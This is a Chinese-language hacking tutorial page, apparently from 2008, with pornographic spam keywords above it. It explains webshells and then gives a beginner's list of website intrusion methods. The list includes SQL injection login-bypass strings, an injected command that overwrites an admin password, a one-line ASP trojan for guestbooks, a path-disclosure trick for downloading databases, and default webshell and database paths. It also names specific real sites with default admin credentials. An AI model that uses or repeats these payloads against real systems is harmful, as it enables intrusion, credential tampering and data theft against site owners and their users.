欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

非常不錯(cuò)的腳本入侵基礎(chǔ)知識(shí)總結(jié)第1/2頁

 更新時(shí)間:2008年06月14日 19:51:12   作者:  
簡(jiǎn)單的說來,webshell就是一個(gè)asp或php木馬后門,黑客在入侵了一個(gè)網(wǎng)站后,常常在將這些 asp或php木馬后門文件放置在網(wǎng)站服務(wù)器的web目錄中,與正常的網(wǎng)頁文件混在一起。
一.Webshell是什么?這是很多朋友在疑惑的問題,
什么是webshell?今天我們就講講這個(gè)話題!

webshell是web入侵的腳本攻擊工具。

簡(jiǎn)單的說來,webshell就是一個(gè)asp或php木馬后門,黑客在入侵了一個(gè)網(wǎng)站后,常常在將這些 asp或php木馬后門文件放置在網(wǎng)站服務(wù)器的web目錄中,與正常的網(wǎng)頁文件混在一起。然后黑客就可以用web的方式,通過asp或php木馬后門控制網(wǎng)站服務(wù)器,包括上傳下載文件、查看數(shù)據(jù)庫、執(zhí)行任意程序命令等。</P>

為了更好理解webshell我們學(xué)習(xí)兩個(gè)概念:

什么是“木馬”?“木馬”全稱是“特洛伊木馬(Trojan<BR>Horse)”,原指古希臘士兵藏在木馬內(nèi)進(jìn)入敵方城市從而占領(lǐng)敵方城市的故事。在Internet上,“特洛伊木馬”指一些程序設(shè)計(jì)人員在其可從網(wǎng)絡(luò)上下載 (Download)的應(yīng)用程序或游戲中,包含了可以控制用戶的計(jì)算機(jī)系統(tǒng)的程序,可能造成用戶的系統(tǒng)被破壞甚至癱瘓。

什么是后門?大家都知道,一臺(tái)計(jì)算機(jī)上有65535個(gè)端口,那么如果把計(jì)算機(jī)看作是一間屋子,那么這65535個(gè)端口就可以它看做是計(jì)算機(jī)為了與外界連接所開的65535 扇門。每個(gè)門的背后都是一個(gè)服務(wù)。有的門是主人特地打開迎接客人的(提供服務(wù)),有的門是主人為了出去訪問客人而開設(shè)的(訪問遠(yuǎn)程服務(wù))——理論上,剩下的其他門都該是關(guān)閉著的,但偏偏由于各種原因,很多門都是開啟的。于是就有好事者進(jìn)入,主人的隱私被刺探,生活被打擾,甚至屋里的東西也被搞得一片狼跡。這扇悄然被開啟的門——就是“后門”。

webshell的優(yōu)點(diǎn)

webshell 最大的優(yōu)點(diǎn)就是可以穿越防火墻,由于與被控制的服務(wù)器或遠(yuǎn)程主機(jī)交換的數(shù)據(jù)都是通過80端口傳遞的,因此不會(huì)被防火墻攔截。并且使用webshell一般不會(huì)在系統(tǒng)日志中留下記錄,只會(huì)在網(wǎng)站的web日志中留下一些數(shù)據(jù)提交記錄,沒有經(jīng)驗(yàn)的管理員是很難看出入侵痕跡的。

如何尋找webshel:

1,腳本攻擊SQL注入<BR>

2,使用注入工具<BR>

3,在瀏覽器里打開百度,輸入搜索關(guān)鍵詞"在本頁操作不需要FSO支持&"或者"一次只能執(zhí)行一個(gè)操作",然后點(diǎn)擊搜索,很快就可以看到檢索到了大量的查詢結(jié)果.<BR>其他的東西,暫時(shí)不多說了,以后再深入吧,每天準(zhǔn)備一個(gè)話題,需要的是巨大的毅力和努力,我們舉辦的每日講座就是為了通俗容易懂的普及信息安全知識(shí),讓不喜歡看文章,覺得信息安全知識(shí)很深?yuàn)W枯燥的人都明白,其實(shí)他只要花很少時(shí)間,就可以了解很多信息安全知識(shí)!

二.菜鳥學(xué)習(xí)入侵的14種可利用方法 

作者:佚名 文章來源:本站原創(chuàng) 點(diǎn)擊數(shù):560 更新時(shí)間:2006-8-9 

1.上傳漏洞[不多講] 

pS: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現(xiàn)“請(qǐng)登陸后使用”,80%就有漏洞了! 

  有時(shí)上傳不一定會(huì)成功,這是因?yàn)镃ookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳. 

2.注入漏洞[不多講] 

pS:對(duì)MD5密碼.有時(shí)我們不是哪么容易跑出來.如果是[SQL數(shù)據(jù)庫].那么我們可以用以下命令: 

http://注入網(wǎng)址;update admin set password='新MD5密碼' where password='舊MD5密碼'--  [admin為表名.] 

3.旁注,也就是跨站. 

我們?nèi)肭帜痴緯r(shí)可能這個(gè)站堅(jiān)固的無懈可擊,我們可以找下和這個(gè)站同一服務(wù)器的站點(diǎn),然后在利用這個(gè)站點(diǎn)用提權(quán),嗅探等方法來入侵我們 要入侵的站點(diǎn)。,在這里有個(gè)難點(diǎn),就是一些服務(wù)器的絕對(duì)路徑經(jīng)過加密,這就看我們的本事了 

4.暴庫:把二級(jí)目錄中間的/換成%5c  

EY:http://www.scbzlx.com/test/test/test.asp?test=test&test=1 

如果你能看到:'E:\test\test\database\test.asa'不是一個(gè)有效的路徑。 確定路徑名稱拼寫是否正確,以及是否 連接到文件存放的服務(wù)器。 

這樣的就是數(shù)據(jù)庫了。下載時(shí)用FLASHGET換成.MDB格式的就行. 

5.'or'='or'這是一個(gè)可以連接SQL的語名句.可以直接進(jìn)入后臺(tái)。我收集了一下。類似的還有: 

'or''=' " or "a"="a  ') or ('a'='a  ") or ("a"="a  or 1=1--  ' or 'a'='a 

6.社會(huì)工程學(xué)。這個(gè)我們都知道吧。就是猜解。 

7.寫入ASP格式數(shù)據(jù)庫。就是一句話木馬[<%execute request("value")%> ],常用在留言本. 

EY:http://www.scbzlx.com/book/book.asp[這個(gè)就是ASP格式的數(shù)據(jù)庫],再寫入一句話木馬 

8.源碼利用:一些網(wǎng)站用的都是網(wǎng)上下載的源碼.有的站長(zhǎng)很菜.什么也不改. 

EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp  

這個(gè)站用的是:杰出校友錄,源碼我下過了, 

默認(rèn)數(shù)據(jù)庫/webshell路徑:\database\liangu_data.mdb 后臺(tái)管理:adm_login.asp 密碼及用戶名都是admin 

9.默認(rèn)數(shù)據(jù)庫/webshell路徑利用:這樣的網(wǎng)站很多/利人別人的WEBSHELL. 

/Databackup/dvbbs7.MDB 

/bbs/Databackup/dvbbs7.MDB 

/bbs/Data/dvbbs7.MDB 

/data/dvbbs7.mdb 

/bbs/diy.asp 

/diy.asp 

/bbs/cmd.asp 

/bbs/cmd.exe 

/bbs/s-u.exe 

/bbs/servu.exe 

工具:網(wǎng)站獵手 挖掘雞 

EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB 

相關(guān)文章

最新評(píng)論